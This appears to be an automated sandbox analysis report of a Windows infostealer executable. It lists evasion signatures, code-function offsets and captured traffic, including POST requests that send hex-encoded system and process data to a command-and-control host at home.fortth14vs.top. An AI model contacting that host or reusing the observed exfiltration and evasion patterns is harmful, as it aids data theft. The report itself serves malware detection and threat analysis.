Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
r8nllkNEQX.exe

Overview

General Information

Sample name:r8nllkNEQX.exe
renamed because original name is a hash value
Original sample name:5d07283413428b07167fbcdbb4063558.exe
Analysis ID:1582706
MD5:5d07283413428b07167fbcdbb4063558
SHA1:0d59f6cfd46fd2a6351d26f983dffc495e8630d3
SHA256:30d0a42cbfa4c3ff9c23fe502c5abfef4910fd3a7997088e6b0ca512b50d53e2
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • r8nllkNEQX.exe (PID: 5572 cmdline: "C:\Users\user\Desktop\r8nllkNEQX.exe" MD5: 5D07283413428B07167FBCDBB4063558)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: r8nllkNEQX.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: r8nllkNEQX.exeReversingLabs: Detection: 55%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: r8nllkNEQX.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: -----BEGIN PUBLIC KEY-----0_2_002FDCF0
Source: r8nllkNEQX.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_0033A5B0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0033A7F0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0033A7F0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0033A7F0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0033A7F0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0033A7F0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0033A7F0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0033B560
Source: r8nllkNEQX.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_002D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_002D255D
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_002D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_002D29FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 442823Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 32 38 39 37 34 38 30 38 36 34 33 35 31 34 34 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c
Source: global trafficHTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: */*
Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_0039A8C0 recvfrom,0_2_0039A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fortth14vs.top
Source: unknownHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 442823Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 32 38 39 37 34 38 30 38 36 34 33 35 31 34 34 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Tue, 31 Dec 2024 08:51:05 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Tue, 31 Dec 2024 08:51:07 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: r8nllkNEQX.exe, 00000000.00000003.1599645314.0000000001593000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1600094570.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1600044768.00000000015A6000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1606989887.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1599729719.00000000015A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZ
Source: r8nllkNEQX.exe, 00000000.00000003.1599645314.0000000001593000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1600094570.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1600044768.00000000015A6000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1606989887.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1599729719.00000000015A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZ(%P
Source: r8nllkNEQX.exe, 00000000.00000003.1600361884.0000000001537000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1600313001.0000000001532000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp, r8nllkNEQX.exe, 00000000.00000002.1606792210.0000000001539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
Source: r8nllkNEQX.exe, 00000000.00000003.1600313001.0000000001532000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1606792210.0000000001539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963
Source: r8nllkNEQX.exe, 00000000.00000003.1599691487.0000000001541000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1606827806.0000000001544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0
Source: r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah
Source: r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18
Source: r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: r8nllkNEQX.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: r8nllkNEQX.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: r8nllkNEQX.exe, r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: r8nllkNEQX.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704

System Summary

barindex
PE file contains section with special chars
Source: r8nllkNEQX.exeStatic PE information: section name:
Source: r8nllkNEQX.exeStatic PE information: section name: .idata
Source: r8nllkNEQX.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_002E05B00_2_002E05B0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_002E6FA00_2_002E6FA0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_0030F1000_2_0030F100
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_0039B1800_2_0039B180
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_0065E0500_2_0065E050
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_0065A0000_2_0065A000
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_003A00E00_2_003A00E0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_003362100_2_00336210
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_0039C3200_2_0039C320
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_003A04200_2_003A0420
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_006244100_2_00624410
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_002DE6200_2_002DE620
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_0039C7700_2_0039C770
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_006367300_2_00636730
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_0033A7F00_2_0033A7F0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_006547800_2_00654780
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_0038C9000_2_0038C900
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_002DA9600_2_002DA960
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_002E49400_2_002E4940
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_004A6AC00_2_004A6AC0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_0058AAC00_2_0058AAC0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_00464B600_2_00464B60
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_0058AB2C0_2_0058AB2C
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_00648BF00_2_00648BF0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_002DCBB00_2_002DCBB0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_0065CC900_2_0065CC90
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_00654D400_2_00654D40
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_00490D800_2_00490D80
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_0064CD800_2_0064CD80
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_005EAE300_2_005EAE30
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_002F4F700_2_002F4F70
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_0039EF900_2_0039EF90
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_00398F900_2_00398F90
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_00622F900_2_00622F90
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_002E10E60_2_002E10E6
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_0063D4300_2_0063D430
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_006435B00_2_006435B0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_006617A00_2_006617A0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_003898800_2_00389880
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_006299200_2_00629920
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_00653A700_2_00653A70
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_00641BD00_2_00641BD0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_00311BE00_2_00311BE0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_00637CC00_2_00637CC0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_00589C800_2_00589C80
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_002E5DB00_2_002E5DB0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_002F5EB00_2_002F5EB0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_002E3ED00_2_002E3ED0
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: String function: 004ACBC0 appears 90 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: String function: 002D75A0 appears 706 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: String function: 002ECCD0 appears 55 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: String function: 002D73F0 appears 114 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: String function: 003B44A0 appears 76 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: String function: 002DC960 appears 37 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: String function: 003150A0 appears 101 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: String function: 00487220 appears 99 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: String function: 002DCAA0 appears 64 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: String function: 002D71E0 appears 47 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: String function: 00315340 appears 50 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: String function: 002ECD40 appears 80 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: String function: 00314F40 appears 333 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: String function: 00314FD0 appears 288 times
Source: r8nllkNEQX.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: r8nllkNEQX.exeStatic PE information: Section: vnoaippe ZLIB complexity 0.9941880097950363
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\r8nllkNEQX.exeCode function: 0_2_002D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_002D255D
